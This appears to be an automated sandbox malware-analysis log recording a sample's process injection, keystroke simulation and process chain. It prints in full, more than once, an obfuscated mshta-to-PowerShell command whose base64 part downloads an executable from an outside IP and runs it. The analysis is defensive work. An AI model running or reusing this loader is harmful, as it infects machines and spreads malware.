Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\AtBroker.exe Thread register set: target process: 8164 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\AtBroker.exe Thread APC queued: target process: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\smss.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3115008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A787B1 LogonUserW, 6_2_00A787B1
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00A23B3A
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00A248D7
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A84C27 mouse_event, 6_2_00A84C27
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\smss.exe "C:\Users\user\AppData\Roaming\smss.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33B5.tmp" "c:\Users\user\AppData\Local\Temp\y35p2qjs\CSC581F3FC65DCD49069962404E1D830F5.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\smss.exe" Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jhggicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvflqzsagicagicagicagicagicagicagicagicagicagicagicattuvnqkvyrgvmaw5pvelvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqcm5ylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmd21fr1hfyw9cdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbhcfrlleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb0q21mzyk7jyagicagicagicagicagicagicagicagicagicagicagicattkftrsagicagicagicagicagicagicagicagicagicagicagicaicfh0iiagicagicagicagicagicagicagicagicagicagicagicatbmftzvnqqunlicagicagicagicagicagicagicagicagicagicagicagifbdeiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumzivnzavc21zcy5leguilcikru52okfquerbvefcc21zcy5leguildasmck7u1rhunqtc0xfrvaomyk7aw52t2tflwl0zu0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxzbxnzlmv4zsi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jhggicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvflqzsagicagicagicagicagicagicagicagicagicagicagicattuvnqkvyrgvmaw5pvelvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqcm5ylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmd21fr1hfyw9cdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbhcfrlleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb0q21mzyk7jyagicagicagicagicagicagicagicagicagicagicagicattkftrsagicagicagicagicagicagicagicagicagicagicagicaicfh0iiagicagicagicagicagicagicagicagicagicagicagicatbmftzvnqqunlicagicagicagicagicagicagicagicagicagicagicagifbdeiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumzivnzavc21zcy5leguilcikru52okfquerbvefcc21zcy5leguildasmck7u1rhunqtc0xfrvaomyk7aw52t2tflwl0zu0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxzbxnzlmv4zsi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jhggicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvflqzsagicagicagicagicagicagicagicagicagicagicagicattuvnqkvyrgvmaw5pvelvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqcm5ylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmd21fr1hfyw9cdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbhcfrlleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb0q21mzyk7jyagicagicagicagicagicagicagicagicagicagicagicattkftrsagicagicagicagicagicagicagicagicagicagicagicaicfh0iiagicagicagicagicagicagicagicagicagicagicagicatbmftzvnqqunlicagicagicagicagicagicagicagicagicagicagicagifbdeiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumzivnzavc21zcy5leguilcikru52okfquerbvefcc21zcy5leguildasmck7u1rhunqtc0xfrvaomyk7aw52t2tflwl0zu0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxzbxnzlmv4zsi='+[char]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jhggicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvflqzsagicagicagicagicagicagicagicagicagicagicagicattuvnqkvyrgvmaw5pvelvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqcm5ylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmd21fr1hfyw9cdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbhcfrlleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb0q21mzyk7jyagicagicagicagicagicagicagicagicagicagicagicattkftrsagicagicagicagicagicagicagicagicagicagicagicaicfh0iiagicagicagicagicagicagicagicagicagicagicagicatbmftzvnqqunlicagicagicagicagicagicagicagicagicagicagicagifbdeiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumzivnzavc21zcy5leguilcikru52okfquerbvefcc21zcy5leguildasmck7u1rhunqtc0xfrvaomyk7aw52t2tflwl0zu0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxzbxnzlmv4zsi='+[char]34+'))')))" Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A77CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 6_2_00A77CAF
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A7874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00A7874B
Source: smss.exe, 00000006.00000000.1539239351.0000000000AD4000.00000002.00000001.01000000.00000009.sdmp, smss.exe.3.dr, smss[1].exe.3.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000000.1720804516.0000000001020000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2697062623.0000000001021000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000000.1875055172.0000000001A70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: smss.exe, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000000.1720804516.0000000001020000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2697062623.0000000001021000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000000.1875055172.0000000001A70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000000.1720804516.0000000001020000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2697062623.0000000001021000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000000.1875055172.0000000001A70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000000.1720804516.0000000001020000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2697062623.0000000001021000.00000002.00000001.00040000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000000.1875055172.0000000001A70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4862B cpuid 6_2_00A4862B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
